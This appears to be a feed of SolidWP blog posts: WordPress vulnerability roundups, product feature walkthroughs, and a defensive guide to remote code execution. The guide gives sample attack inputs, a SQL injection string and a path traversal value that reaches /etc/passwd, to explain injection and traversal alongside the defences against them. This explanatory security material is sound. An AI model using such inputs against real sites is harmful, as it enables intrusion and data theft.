HT Easy GA4 – Google Analytics WordPress Plugin
- Plugin Slug:
- ht-easy-google-analytics
- Installations
- 6,000+
- Vulnerability:
- Broken Access Control
- Patched in Version:
- No Fix
- Severity Score:
- Medium
- CVE:
- 2024-1176
The post WordPress Vulnerability Report — March 13, 2024 appeared first on SolidWP.
]]>Additionally, there are 13 plugin vulnerabilities with no patch available yet. If you’re a Solid Security Pro user, those vulnerabilities are already protected by the Solid Security firewall. Virtual patches from Patchstack will be applied when a vulnerability is considered high or medium risk. If no patch is forthcoming from the vendor or the vulnerable software has been marked “closed” and dropped from the official WordPress repositories, you should deactivate it soon and look for alternative solutions.
WordPress 6.4.3 was released on January 30, 2024, as a short-cycle maintenance and security release with five bug fixes in Core and 16 bug fixes for the Block Editor. It is recommended that you update your sites immediately.
The next major release will be version 6.5, planned for March 26, 2024.
Every WordPress site needs security, backups, and management tools. That’s Solid Suite — an integrated bundle of three plugins: Solid Security, Solid Backups, and Solid Central. You also get access to Solid Academy’s learning resources for WordPress professionals. Build your next WordPress website on a solid foundation with Solid Suite!
The post WordPress Vulnerability Report — March 13, 2024 appeared first on SolidWP.
]]>The post Solid Security Pro Feature Spotlight: Trusted Devices appeared first on SolidWP.
]]>All of the features in Solid Security Pro are designed to help you lock down, secure, and protect your WordPress site. In this post, we highlight the Trusted Devices feature in Solid Security Pro and share a bit about why we developed the feature, who the feature is for, and how to use the feature.
The Trusted Devices feature in the Solid Security Pro plugin works to identify the devices that you and other users use to log in to your WordPress site. After your devices are identified, we can stop session hijackers and other bad actors from doing any damage on your website.
When a user has logged in on an unrecognized device, Trusted Devices can restrict their administrator-level capabilities. This means that if an attacker were able to break into the backend of your WordPress site, they wouldn’t have the ability to make any malicious changes to your website.
Solid Security Pro will also send you an email that lets you know that someone logged into your site from an unrecognized device. The email includes an option to block the hacker’s device.
Let’s unpack three big reasons you need Trusted Devices to protect your WordPress site.
Let’s say you follow all of the WordPress security best practices to protect your user account. Not only do you use a unique, strong password for every site, but you also lock down all of your online accounts with two-factor authentication. You are a good example of what it looks like to take WordPress security seriously.
Yet, even with all of the security measures you put into place, somehow, your website was still hacked. And, to make matters worse, the attacker used your WordPress user account to hack the site. How did this happen to you?
Unfortunately, even if you do everything right to secure your WordPress user account, there are still methods that hackers can use to exploit your account that are related to other software you may be using.
For example, WordPress generates a session cookie every time you log into your website. And, let’s say that you have a browser extension that has been abandoned by the developer and is no longer releasing security updates. Unfortunately for you, the neglected browser extension has a vulnerability. The vulnerability allows bad actors to hijack your browser cookies, including the earlier-mentioned WordPress session cookie. This type of hack is known as Session Hijacking. So, an attacker can exploit the extension vulnerability to piggyback off your login and start making malicious changes to your WordPress user.
Pretty crummy, right? We agree, so we created a way to protect your account, even when bad actors can find and exploit other vulnerabilities. That’s where Trusted Devices comes in. With the Solid Security Pro plugin, you can identify the devices that you and other users log in to your WordPress site. Any logins from unknown devices will be blocked, adding another strong layer of security to your site.
The primary benefit of Trusted Devices is that it makes Session Hijacking a thing of the past. If a user’s device changes during a session, Solid Security will automatically log the user out to prevent any unauthorized activity on the user’s account, such as changing the user’s email address or uploading malicious plugins.
To get started with Trusted Devices, navigate to the security settings Features menu in your WordPress admin dashboard. From this screen, enable Trusted Devices. After enabling Trusted Devices, click the settings cogwheel.
In the Trusted Devices settings, enable the Restrict Capabilities and Session Hijacking Protection features.
Click the User Groups link to enable Trusted Devices for specific users.
After enabling the new Trusted Devices setting, users will receive a notification in the WordPress admin bar about pending unrecognized devices. If your current device hasn’t been added to the trusted devices list, click the Confirm This Device link to send the authorization email.
Click the Confirm Device button in the Unrecognized Login email to add your current devices to the Trusted Devices list.
Additionally, you have the option to signup for some third-party APIs to improve the accuracy of the Trusted Devices identification and to use static image maps to display the approximate location of an unrecognized login. Check out the Trusted Devices setting to see what integrations are available.
We didn’t think it was fair for you to do all the work to secure your website, just for some hacker to find a vulnerability loophole. The Trusted Devices feature in Solid Security Pro allows you to restrict access to your site’s backend to a list of approved devices. Now that is awesome!
Solid Security, our WordPress security plugin, gives you 30+ ways to secure and protect your WordPress site. On average, 30,000 new websites are hacked each day. WordPress sites can be an easy target for attacks because of plugin vulnerabilities, weak passwords, and obsolete software.
Most WordPress admins don’t know they’re vulnerable, but Solid Security works to lock down WordPress, fix common holes, stop automated attacks, and strengthen user credentials. With advanced features for experienced users, our WordPress security plugin can help harden WordPress.
The post Solid Security Pro Feature Spotlight: Trusted Devices appeared first on SolidWP.
]]>The post Solid Backups Maintenance Release 9.1.10 appeared first on SolidWP.
]]>The 9.1.10 release is available now via automatic updates in WordPress sites where Solid Backups is installed. You may also download it from your SolidWP member panel at my.solidwp.com.
The post Solid Backups Maintenance Release 9.1.10 appeared first on SolidWP.
]]>The post Solid Central Streamlines Site Management with New Tagging Feature appeared first on SolidWP.
]]>In your Solid Central Dashboard, click the drop-down arrow for the site you wish to add a tag to.
Click on the Tags tab.
Click the Edit icon.
A pop-up will appear. Click on Create a new tag.
Enter the Tag Name and Description if applicable. Choose a color for your tag and click Save.
You will now see the tag(s) associated with that site.
To search for sites with a particular tag, click Filter Websites. Then choose the tag(s) you want to filter. Only sites with the tags you chose will be listed.
Solid Central lets you manage multiple websites with ease. And the latest update marks a significant leap forward in site management capabilities. With the enhanced tagging and filtering features, brands overseeing a multitude of connected sites can now streamline their workflow like never before. This dynamic enhancement not only boosts efficiency but also provides a more intuitive and user-friendly experience.
The post Solid Central Streamlines Site Management with New Tagging Feature appeared first on SolidWP.
]]>The post WordPress Vulnerability Report — March 6, 2024 appeared first on SolidWP.
]]>Additionally, there are 49 plugin and theme vulnerabilities with no patch available yet. If you’re a Solid Security Pro user, those vulnerabilities are already protected by the Solid Security firewall. Virtual patches from Patchstack will be applied when a vulnerability is considered high or medium risk. If no patch is forthcoming from the vendor or the vulnerable software has been marked “closed” and dropped from the official WordPress repositories, you should deactivate it soon and look for alternative solutions.
WordPress 6.4.3 was released on January 30, 2024, as a short-cycle maintenance and security release with five bug fixes in Core and 16 bug fixes for the Block Editor. It is recommended that you update your sites immediately.
The next major release will be version 6.5, planned for March 26, 2024.
Every WordPress site needs security, backups, and management tools. That’s Solid Suite — an integrated bundle of three plugins: Solid Security, Solid Backups, and Solid Central. You also get access to Solid Academy’s learning resources for WordPress professionals. Build your next WordPress website on a solid foundation with Solid Suite!
The post WordPress Vulnerability Report — March 6, 2024 appeared first on SolidWP.
]]>The post Solid Backups Maintenance Release 9.1.9 appeared first on SolidWP.
]]>The 9.1.9 release is available now via automatic updates in WordPress sites where Solid Backups is installed. You may also download it from your SolidWP member panel at my.solidwp.com.
The post Solid Backups Maintenance Release 9.1.9 appeared first on SolidWP.
]]>The post WordPress Vulnerability Report — February 28, 2024 appeared first on SolidWP.
]]>Additionally, there are 25 plugin vulnerabilities with no patch available yet. If you’re a Solid Security Pro user, those vulnerabilities are already protected by the Solid Security firewall. Virtual patches from Patchstack will be applied when a vulnerability is considered high or medium risk. If no patch is forthcoming from the vendor or the vulnerable software has been marked “closed” and dropped from the official WordPress repositories, you should deactivate it soon and look for alternative solutions.
WordPress 6.4.3 was released on January 30, 2024, as a short-cycle maintenance and security release with five bug fixes in Core and 16 bug fixes for the Block Editor. It is recommended that you update your sites immediately.
The next major release will be version 6.5, planned for March 26, 2024.
The post WordPress Vulnerability Report — February 28, 2024 appeared first on SolidWP.
]]>The post Remote Code Execution: A Guide For WordPress Users appeared first on SolidWP.
]]>If you’re serious about your website’s security, then it’s time to learn about the dangers of remote code execution vulnerabilities and how you can combat them.
Remote code execution (RCE) refers to several different hacking techniques and cyberattacks, but they all have one major thing in common. RCE, sometimes called code injection, is an increasingly common way for hackers to compromise websites of all kinds, including sites that run WordPress as their content management system.
In this guide, we’ll explain in detail what a remote code execution attack looks like, and the steps you need to take to avoid one. Let’s take a look.
Remote Code Execution (RCE) is a type of vulnerability that allows a hacker to access and change a computer or database owned by someone else.
During an RCE attack, a hacker overtakes the server or computer through malware (arbitrary malicious software).
A remote code execution attack is carried out without the authority of the hardware owner, and it doesn’t matter where the data is stored in the world.
It may be helpful to think of remote code execution attacks like termite infections:
While the metaphor isn’t exactly the same as how an RCE attack works, an RCE attack is actually worse. Unlike the termite that has to be at your house (or in it), a hacker can access your website from anywhere.
The fact is, RCE attacks are incredibly dangerous because hackers can execute any malicious code on a vulnerable server.
There’s really no limit to the damage a skilled RCE hacker can do to your WordPress site if they gain access to it.
In 2018, Microsoft disclosed a remote code execution vulnerability found in the software program, Excel. An attacker could exploit the vulnerability to run arbitrary code in the current user’s context.
If the current user was logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts were configured to have fewer user rights on the system could be less impacted than those with administrative user rights.
To better understand RCE hacks, you need to be aware of the different types of remote code execution:
Your WordPress website uses a MySQL database to operate. SQL injections occur when an attacker gains access to your WordPress database and your website data.
With an SQL injection, an attacker may be able to create a new admin-level user account which can then be used to log in and get full access to your WordPress website. SQL injections can also insert new data into your database, including links to malicious or spam websites.
Many RCE vulnerabilities attack the way that WordPress SQL statements are constructed. As an example, if an application needs to read database usernames, a developer might make the mistake of using code such as the below for a username search:
SELECT * FROM users WHERE name = 'username'
But what is the problem with a query like this related to RCE? Any visitor to your WordPress site, even hackers with bad intent, can enter a username. As an example, the hacker might enter ‘1”1’= –, OR ‘, which would result in an SQL statement like this:
SELECT * FROM users WHERE name = '1'='1' --' OR ''
Assuming that the application proceeds to search through the entire database for site usernames, and then selects each field where there is a blank name, when 1 is equal to 1, the latter is always true. What ends up happening is that the hackers are provided with every username within the SQL database.
However, A data leak like this isn’t the only danger with SQL injections. An attacker could also send many commands into the SQL database, which could overwrite or delete crucial WordPress site data.
Cross-site scripting is yet another RCE vulnerability. It directly impacts site visitors, rather than your servers. Cross-site scripting (XSS) is a malware attack executed by exploiting cross-site vulnerabilities on any WordPress site. In fact, it’s the most common way for WordPress sites to be hacked because so many WordPress plugins have XSS vulnerabilities.
Within each webpage, code, and content are rendered in identical ways. However, a web browser can set code apart from content because it’s always wrapped in script tags. What this means is that, without a proper filter, attackers can stuff malicious code into any place on a webpage that allows text to be entered.
Without a proper filter, attackers are able to stuff malicious code into any place on a webpage that allows text to be entered. Are you protected?
This includes vulnerable fields such as search bars (often on every page of your WordPress site), comment sections, or even display names.
When this attack is executed, your website’s browser will run the malicious code.
Cross-site scripting wouldn’t be as big of a security issue if only executed on the attacker’s browser. However, when the malicious code is viewable to the public, such as in comment sections of your blog posts, it’ll also impact any visitor who views the content.
With this dangerous ability to execute any code remotely, an attacker can easily steal passwords and pretend to be legitimate users.
They can also potentially view that user’s personal information, such as credit card details or PayPal account info.
This attack isn’t targeted at an application or your WordPress site visitors. Instead, the main target is your actual website.
The RCE vulnerability exploits how site files are stored in the file system of your website server.
Normally, data is stored within a standard directory, like /home/user/public_html. The scripts within the directory access files by using a relative path, like wp-admin/index.php that directly refer to /home/user/public_html/wp-admin/index.php.
When a script is configured to access a file that’s outside of the current directory, it accomplishes this simply by including a “../”. This refers to the directory that’s one step above the current directory.
As an example, the directory pattern /home/user/public_html/../ is directed to /home/user/.
If a script is allowed to read or upload from any custom filenames, an attacker will direct the application toward traversing directories, with a name such as ../../../../../../../../../etc/passwd.
If you haven’t implemented important security features such as input filtering, the hacker can gain direct access to your server’s core files, which is bad news for your site security.
The detailed information in this guide isn’t meant to intimidate or cause you any fear. Rather, it’s intended to highlight the increasing importance of having the most robust WordPress site security measures running at all times.
It also serves as a reminder to keep your plugins updated to ensure they are not open to new RCE vulnerabilities.
The vast majority of RCE attacks can be mitigated or stopped completely just by being aware and prepared before they happen. As WordPress site owners, it’s important to anticipate and understand how our site servers process the information that our users provide.
The number one way to ensure your site is secure from RCE vulnerabilities is to employ a multi-faceted defense system. In other words, even if one line of defense fails you, you’ll still remain protected from potential attack.
With that said, let’s look at some of the most important steps you should take to prevent these malicious and often dangerous attacks. Several factors can make your WordPress site more vulnerable to successful attacks.
To get started securing and protecting your site, download and install the Solid Security Pro plugin.
Simply put: You’re putting yourself at risk for an attack if you are running outdated versions of WordPress, plugins, and themes on your website. Version updates often include patches for security issues in the code, including remote code execution (RCE) vulnerabilities, so it’s important always to run the latest version of all software installed on your WordPress website.
Updates will appear in your WordPress dashboard as soon as they’re available. Practice running a backup and running all available updates every time you log in to your WordPress site. While running updates may seem inconvenient or tiresome, it’s an important WordPress security best practice.
It is hard to keep track of every disclosed WordPress vulnerability—we keep track and share them in our WordPress Vulnerability Roundups—and compare that list to the versions of plugins and themes you have installed on your website. However, this doesn’t stop WordPress hackers from targeting plugins and themes with known vulnerabilities. Having software with known vulnerabilities installed on your site gives hackers the blueprints they need to take over your website.
The Version Management feature in the Solid Security Pro plugin allows you to auto-update WordPress, plugins, and themes. Beyond that, Version Management also has options to harden your website when you are running outdated software and scan for old websites.
To get started using Version Management, enable the module on the main page of the security settings.
Now click the Down Arrow to take a closer look at the settings, all designed to protect your site.
Now, let’s, take a closer look at configuring plugin and theme updates. Before we get started, just a quick reminder that enabling the plugin and theme update settings will disable the WordPress auto-update feature to prevent conflicts.
Both the Plugin and Theme Update Settings have three choices.
Now let’s take a closer look at the Custom option.
Selecting the Custom option provides three different choices for your plugin and theme updates. As we can see, the Custom auto-updates setting offers a lot more flexibility than WordPress’s on or off auto-update option.
The Solid Security Pro Site Scanner is another way to secure and protect your WordPress website from the number one cause of all software hacks: outdated plugins and themes with known vulnerabilities. The Site Scanner checks your site for known vulnerabilities and automatically apply a patch if one is available.
To enable the Site Scan on new installs, navigate to the Solid Security Pro settings, select Features, and click the Enable toggle on the Site Check settings module.
To trigger a manual Site Scan, click on Site Scans and then the Start Site Scan button located at the top right of the screen.
The Site Scan results will display.
If the Site Scan detects a vulnerability, click the vulnerability link to view the details page.
On the Site Scan vulnerability page, you will see if there is a fix available for the vulnerability. If there is a patch available, you can click the Update Plugin button to apply the fix on your website.
There can be a delay between when a patch is available and the Solid Security Vulnerability Database getting updated to reflect the fix. In this case, you can mute the notification to not receive any more alerts related to the vulnerability.
You should have session hijacking protection in place for your Admins and Editors on your WordPress website to protect yourself from remote code execution vulnerabilities.
The Solid Security Pro Trusted Devices feature makes Session Hijacking a thing of the past. If a user’s device changes during a session, Solid Security will automatically log the user out to prevent any unauthorized activity on the user’s account, such as changing the user’s email address or uploading malicious plugins.
The Trusted Devices feature in Solid Security Pro works to identify the devices that you and other users use to login to your WordPress site. After your devices are identified, we can stop session hijackers and other bad actors from doing any damage on your website.
When a user has logged in on an unrecognized device, Trusted Devices can restrict their administrator-level capabilities. This means that if an attacker were able to break into the backend of your WordPress site, they wouldn’t have the ability to make any malicious changes to your website.
To start using Trusted Devices, enable them on the main page of the security settings, and then click the Configure Settings button.
In the Trusted Devices settings, decide which users you want to use the feature, and enable then Restrict Capabilities and Session Hijacking Protection features.
After enabling the new Trusted Devices setting, users will receive a notification in the WordPress admin bar about pending unrecognized devices. If your current device hasn’t been added to the trusted devices list, click the Confirm This Device link to send the authorization email.
Click the Confirm Device button in the Unrecognized Login email to add your current devices to the Trusted Devices list.
Once Trusted Devices is enabled, users can manage devices from their WordPress User Profile page. From this screen, you can approve or deny devices from the Trusted Devices list.
Additionally, you have the option to sign up for some third-party APIs to improve the accuracy of the Trusted Devices identification and to use static image maps to display the approximate location of an unrecognized login. Check out the Trusted Devices setting to see what integrations are available.
Two-factor authentication is a process of verifying a person’s identity by requiring two separate methods of verification. Google shared on its blog that using two-factor authentication can stop 100% of automated bot attacks. Not bad odds!
The Solid Security plugin allows you to activate two-factor authentication for your WordPress site so users must enter a secondary code to log in.
The three two-factor authentication methods provided by Solid Security Pro include:
To start using Two-Factor Authentication on your website, enable the feature on the main page of the Solid Security Pro settings.
Follow the steps here to continue setting up two-factor authentication for your WordPress site. If you followed our recommendations and enabled the force requirements for privileged users, the next thing you will see is the place to enter the two-factor token.
The process of “escaping,” works great as your first line of defense against RCE vulnerabilities. However, there are some additional ways that code can be interpreted by servers and browsers, beyond the script tags.
If your goal is to keep track of each and every one of them on your own, it would be very complicated and require a ton of your time and resources.
Fortunately, application developers have put a lot of thought into the issue of RCE vulnerabilities.
It’s best to use a trusted and reputable CMS (content management system) like WordPress because there are solutions built right into the platform and the themes and plugins that you run on it.
It’s always essential you keep all software applications and plugins up-to-date when new versions are released. When vulnerabilities are uncovered, software developers will work around the clock to stay ahead of the weaknesses they discover.
This is true for both plugin and theme authors.
If you’re using a custom CMS instead of WordPress, you can keep your site safe from potential SQL injections by utilizing parameterized queries. This query type will inform an application, in advance, the exact type of query you’re going to run. It’ll then recognize and remove added commands which a hacker might attempt to insert. Instead of successful insertion, it’ll send the original query and exclude the string that was added.
In the above example, a parameterized query would look like this:
$query=”SELECT * FROM users WHERE name = ?” $results=$query.execute(“ ' OR '1'='1' --”)
In this scenario, your database is handling ‘ OR ‘1’=’1′ in the correct manner. It looks at this query as a string of only text and understands that there isn’t a user associated with the name provided.
The best place to begin preventing RCE vulnerabilities is where your site users interact with your application.
The simplest method is to remove and filter out any characters that are undesired.
Yet another option is preserving content by escaping it.
If you’re not familiar with what escaping means, it’s the process in which you instruct your computer to look at something which appears to be code as regular text. For example, you’d replace a script tag with “<script>”.
By doing this, a web browser understands to display the less-than “< and greater than “> symbols at the specified location. But it won’t treat the entire string of text as code.
To the user, the result is invisible.
There may be rare instances where a zero-day RCE vulnerability could arise. This means that neither you nor the CMS and application developers are aware of a specific new type of attack.
Even in a case such as this, we’re still able to limit the damage that an attacker can do by setting up some simple rules about what an application is able to do.
For example, imagine you’re designing an application that reads from a database. It really wouldn’t be necessary to give the new application the ability or permission to delete or write database records.
In this case, even if attackers try to compromise the script, they’ll encounter an error and fail at their attempt.
The least privilege principle is also useful as it relates to PHP functions.
PHP functions are a standard target for online attackers of all kinds. Robust functions that might not be needed for your app, such as ini_set() (this allows you to update your PHP settings from within script) or exec() (which runs code passed as text), should be disabled.
This prevents hackers and attackers from using them for malicious purposes.
This idea applies to securing the public-facing areas of your website and the server-side code.
Content-Security-Policy is a header used in HTTP by most modern web browsers. It determines what types of content the browser is supposed to load on your website. When you send headers from your application or web server, you’ll be able to specify the types of scripts that are allowed to run, and to which locations.
Using the strategy helps prevent hackers from injecting their malicious scripts.
Yet another option is to prevent scripts from reading cookies. This stops requests from being sent to other sites.
This is done by setting them with the SameSite=Strict or HttpOnly attributes. Even when a hacker’s code gets run on your WordPress site, you’ll prevent them from gaining access to your site user’s authentication cookies.
This will significantly reduce the potential damage during a WordPress remote code execution attack.
Don’t worry if you’re feeling a bit overwhelmed when you discover the potential security threats seeking out your WordPress site. The truth is that the threats are many, but the solutions can be simple.
We hope this guide helped you understand the risk of RCE attacks on your WordPress site. By implementing a few WordPress security best practices, along with the 5 steps above, you’ll have a better line of defense.
Get started with confidence — risk free, guaranteed
The post Remote Code Execution: A Guide For WordPress Users appeared first on SolidWP.
]]>The post WordPress Vulnerability Report — February 21, 2024 appeared first on SolidWP.
]]>Additionally, there are 20 plugin vulnerabilities with no patch available yet. If you’re a Solid Security Pro user, those vulnerabilities are already protected by the Solid Security firewall. Virtual patches from Patchstack will be applied when a vulnerability is considered high or medium risk. If no patch is forthcoming from the vendor or the vulnerable software has been marked “closed” and dropped from the official WordPress repositories, you should deactivate it soon and look for alternative solutions.
WordPress 6.4.3 was released on January 30, 2024, as a short-cycle maintenance and security release with five bug fixes in Core and 16 bug fixes for the Block Editor. It is recommended that you update your sites immediately.
The next major release will be version 6.5, planned for March 26, 2024.
The post WordPress Vulnerability Report — February 21, 2024 appeared first on SolidWP.
]]>The post Solid Security Pro Feature Spotlight – Two-Factor Authentication appeared first on SolidWP.
]]>In the Feature Spotlight posts, we highlight a feature in Solid Security Pro and share a bit about why we developed the feature, who the feature is for, and how to use the feature.
Today, we are going to cover Two-Factor Authentication, a proven method to secure and protect your WordPress site.
According to the Verizon Data Breach Investigations Report, over 70% of employees reuse passwords at work. But the most important stat from the report is that “81% of hacking-related breaches leveraged either stolen or weak passwords.”
The “Collection #1″ Data Breach that was hosted on MEGA included 1,160,253,228 unique combinations of email addresses and passwords. This kind of score will provide a malicious bot with over a billion sets of credentials to use in brute force attacks. A brute force attack refers to a trial and error method used to discover username and password combinations to hack into a website.
All of these reasons and more should make you want to add another layer of protection to your WordPress login.
Even if you use a password manager like LastPass to create strong and unique passwords for each of your accounts, you still need to consider other administrator and editor users on your site. If an attacker was able to compromise one of their accounts, they could still do damage to your website.
Fortunately, there is a method to secure your WordPress user accounts: two-factor authentication.
Two-factor authentication is a process of verifying a person’s identity by requiring two separate methods of verification. Google shared on its blog that using two-factor authentication can stop 100% of automated bot attacks.
Two-factor authentication uses different categories of identify verification:
1. Something You Know. Do you remember filling out security questions when setting up your online mortgage account? Something like Who is your favorite teacher? Or What is your mother’s maiden name? These security questions are a form of two-factor authentication by requiring answers you would only know.
2. Something You Have. This category requires you to have something physically in your possession–like your phone or a Yubikey–to prove your identity. For example, some two-factor authentication methods require a time-based code sent to a specific device via a 2FA app.
3. Something You Are. You may not know the name, but if you have a smartphone, you have probably used biometric authentication to log into your phone. Biometric authentication requires a unique biological characteristic to authenticate your login. If your phone has a fingerprint scanner or Face ID, you are using biometric authentication every time you unlock your phone.
Requiring an added another method of identity verification to log into your website would block all automated brute force attacks and help protect you if there is a Broken Authentication vulnerability on your website. A Broken Authentication vulnerability can allow an attacker to compromise a user or user’s passwords, keys, or session tokens to take over the user’s accounts.
To get started with Two-Factor Authentication, navigate to the security settings’ Features menu and enable the Two-Factor.
Now, let’s take a closer look at the Two-Factor settings.
Authentication Methods Available to Users – The settings let you choose which of the three authentication methods you will allow people to use.
The three authentication methods provided by Solid Security Pro:
Alright, let’s move on to the rest of the two-factor settings.
We created the two-factor onboarding to create a user-friendly way for people to set up two-factor on their accounts when they log in. After you enable two-factor authentication, every user will be guided through the onboarding process. You can disable two-factor onboarding for specific user groups in the two-factor settings.
Alright, let’s walk through the logging-in and the two-factor onboarding process step by step.
Just like normal, the first thing you will see is the login form. Enter your credentials and click the Log In button.
If you follow our recommendations and enable the force 2fa requirements for privileged users, the next thing you will see is a place to enter the two-factor token sent to your email address. Open the email, copy and paste the token, and then click the Log In button.
On the next screen, you will be presented with the onboarding welcome text. Keep in mind that you can customize this in your two-factor settings. Click the Continue button to move on to the next step.
The next step is to select which two-factor methods you want to enable for your account. Click on the Backup Codes arrow to generate a list of backup codes to use if your primary method of authentication fails.
Now click the Download button to download a text file of your backup codes. Be sure to store these codes somewhere safe.
Now click the Back link to return to the previous screen. Now, let’s click on the Mobile App arrow to enable and configure this method of authentication for our user.
Now, choose your mobile OS and then open your mobile two-factor app on your phone.
From your phone, scan the QR code to continue to link the secret to your mobile app.
Now enter the 6-digit code from your phone into your web browser and click Verify to finish the mobile app setup.
Alight, now that you have two-factor all setup, click the Continue button to finish logging into your WordPress dashboard.
To sum up, there is nothing as easy and secure as adding two-factor authentication to your WordPress login. If you aren’t currently using two-factor, add it to your website now and start protecting yourself against automated attacks.
The post Solid Security Pro Feature Spotlight – Two-Factor Authentication appeared first on SolidWP.
]]>